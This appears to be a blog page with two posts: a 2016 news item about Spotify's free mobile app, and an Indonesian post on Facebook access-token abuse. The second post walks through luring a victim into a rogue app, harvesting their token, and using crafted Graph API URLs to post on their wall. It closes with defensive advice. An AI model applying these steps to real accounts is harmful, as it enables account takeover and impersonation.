Wednesday, September 7, 2016
Spotify To Give Free Access To Mobile App On December 11th
Spotify To Give Free Access To Mobile App On December 11th
In the increasing competitive world of music streaming services, one feature of streaming giant Spotify has been glaringly absent since the services launch. That feature, of course, is free access to the mobile app; in Spotifys current revenue model, only subscribers to their premium service are able to access and use their mobile app on Android, iOS and a whole host of other mobile platforms. Well, that looks like its about to change as the Wall Street Journal has confirmed that Spotify is looking to bring a free, ad-supported app to mobile, finally rounding out Spotifys line-up of features.
This new access is said to be going live on December 11th and brings Spotify in line with sizable competitors like Pandora who have been providing a free mobile app for quite some time now. It will be interesting to see how this actually affects to Spotify; I know I for one, as a Spotify subscriber, only subscribed to the premium service so I could get access to the mobile app. Living with the extra ads may be an acceptable sacrifice for some subscribers who will then switch over to the free service, though the converse is also possible.
Whos been waiting for this feature to be added to Spotifys service? Is it too little too late? Let us know what you think.
Note: There is a poll embedded within this post, please visit the site to participate in this posts poll.
Source: The Wall Street Journal, TechCrunch
by Stephen Yuen via AndroidSPIN
Go to link download
Sunday, August 28, 2016
Bahaya Access Token Dan Cara Mengatasinya
Bahaya Access Token Dan Cara Mengatasinya
Access Token merupakan struktur data yang berisi informasi keamanan yang dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun Facebook) atau proses lainnya yang membutuhkan otorisasi.Dari mana Access Token tercipta ?Seperti yang kita ketahui bersama, Facebook memiliki ribuan bahkan mungkin jutaan apps (aplikasi) untuk memanjakan penggunanya. Dari setiap penggunaan apps tersebutlah Access Token tercipta. Setiap Access Token akan tersimpan pada server hostingan pembuat aplikasi Facebook.Kenapa dikatakan Access Token berbahaya ?Apabila Access Token akun Facebook anda diketahui oleh orang yang tidak bertanggung jawab maka orang tersebut dapat meng-update-kan status Facebook anda, mem-posting link dan dapat pula memasukkan foto/gambar tanpa perlu melakukan login ke akun Facebook anda. Mungkin diantara kita pernah mendengar beberapa kasus pengguna Facebook berurusan dengan pihak Kepolisian bahkan sampai ke depan meja hijau akibat dari status Facebook-nya.Di sini saya akan mempraktekkan proses kerjanya, bukan mengajarkan. Dan di akhir penjelasan nanti akan dijelaskan bagaimana cara untuk menghindarinya. Baiklah, mari kita mulai.Pertama tama saya akan login ke akun Facebook saya sendiri. Antara akun Facebook saya denganFacebook korban tidak saling berteman. (jika berteman lebih baik lagi)
Sebelumnya, saya telah membuat sebuah aplikasi sederhana di Facebook. Dengan memanfaatkan tekhnik social engineering saya memberikan link aplikasi Facebook itu kepada korban agar tergiur untuk menggunakannya. Link aplikasinya adalah http://apps.facebook.com/via_apa_saja/%20(Aplikasi Update Status Facebook Via Apa Saja)Sang korban tergiur dan menggunakan aplikasi Facebook dari saya.
Untuk lebih memastikan apakah korban sudah menggunakan aplikasi Facebook dari saya, langsung saja saya login ke cpanel lalu menuju ke phpMyAdmin.
Dan ternyata si korban telah menggunakan aplikasi Facebook dari saya. Yang ditandai kotak warna merah adalah access_token Facebook korban.
Mari kita coba untuk meng-update-kan status Facebook korban dengan sedikit injeksi url
Injeksi url :
https://graph.facebook.com/ID-FACEBOOK/feed?method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN
Menjadi :
https://graph.facebook.com/100003787395136/feed?method=POST&message=Test update status online :lol:&access_token=AAAFc7v
0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47c
NL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD
Untuk melihat hasilnya silakan Anda klik "injeksi url" di atas lalu buka wall profil Facebook korban
Selanjutnya kita coba untuk mem-posting LINK ke akun Facebook korban.
Injeksi url :
https://graph.facebook.com/ID/feed?method=POST&link=URL&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN
Menjadi :
Terakhir, saya akan memasukkan sebuah gambar ke dalam akun Facebook korban.
Injeksi url :
https://graph.facebook.com/photos?url=URL GAMBAR&method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN
Menjadi :
https://graph.facebook.com/photos?url=http://www.cyber4rt.com/idsecconf2012/logo.png&method=POST&message=TEST UPLOAD GAMBAR&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Sr
fio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixp
QVPgZDZD
Masuk ke Pengaturan Privasi Aplikasi FacebookCari aplikasi Facebook yang mencurigakan, contoh pada demo kali ini aplikasinya bernama ACCESS_TOKEN, klik edit (sunting) pada aplikasi tersebut.Di sini ada beberapa pilihan, perhatikan gambar di bawah ini
merah : menghapus aplikasi dari akun Facebook Anda (direkomendasikan)
biru : menghapus akses aplikasi yang tidak Anda inginkan (pilihan)
hijau : mengatur siapa saja yang dapat melihat posting-an dari aplikasi, pilih "Only Me" (pilihan)
Akhir kata, jangan sembarang menggunakan aplikasi Facebook. Gunakan aplikasi Facebook hanya dari
sumber yang terpercaya. Sekian dan terima kasih, lebih dan kurangnya mohon dimaafkan.
SUMBER
Go to link download